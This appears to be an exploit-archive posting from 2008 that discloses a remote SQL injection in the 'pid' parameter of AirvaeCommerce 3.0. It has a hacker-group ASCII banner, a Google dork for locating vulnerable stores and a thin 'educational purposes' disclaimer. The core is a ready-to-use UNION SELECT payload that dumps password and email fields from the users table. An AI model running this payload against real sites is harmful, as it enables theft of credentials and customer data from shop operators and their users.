[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability
# Published : 2008-05-29
# Author : QTRinux
# Previous Title : SyntaxCMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit
# Next Title : PicoFlat CMS 0.5.9 Local File Inclusion Vulnerabilitty (win)
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' __ /'__` / __ /'__` / ___ |
| /_, ___ /_/_L ___ ,_/ / _ __ __/ |
| /_/ /' _ ` / /_/__<_ /'___ / /`'__ ___`` |
| / / / L / __/ _ _ / / L |
| _ _ __ ____/ ____\ __\ ____/ _ ____/ |
| /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ /___/ |
| ____/ >> Kings of injection |
| /___/ |
| &nb sp; |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title :: Remote SQL Injection
Author :: QTRinux [Qataro (at) hotmail (dot) Com]
Application :: AirvaeCommerce 3.0
Download :: http://www.airvaecommerce.com
Price :: $179
Dork 1 :: powered by AirvaeCommerce 3.0
ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
Vulnerability: http://localhost/ path script / ?p=vzh&pid= [SQL]
Example : /?p=vzh&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/*
Note : Some site used SELECT statements have a different number of columns about 45 .
-------------------------------------------[End of context]----------------------------------------
# www.Syue.com [2008-05-29]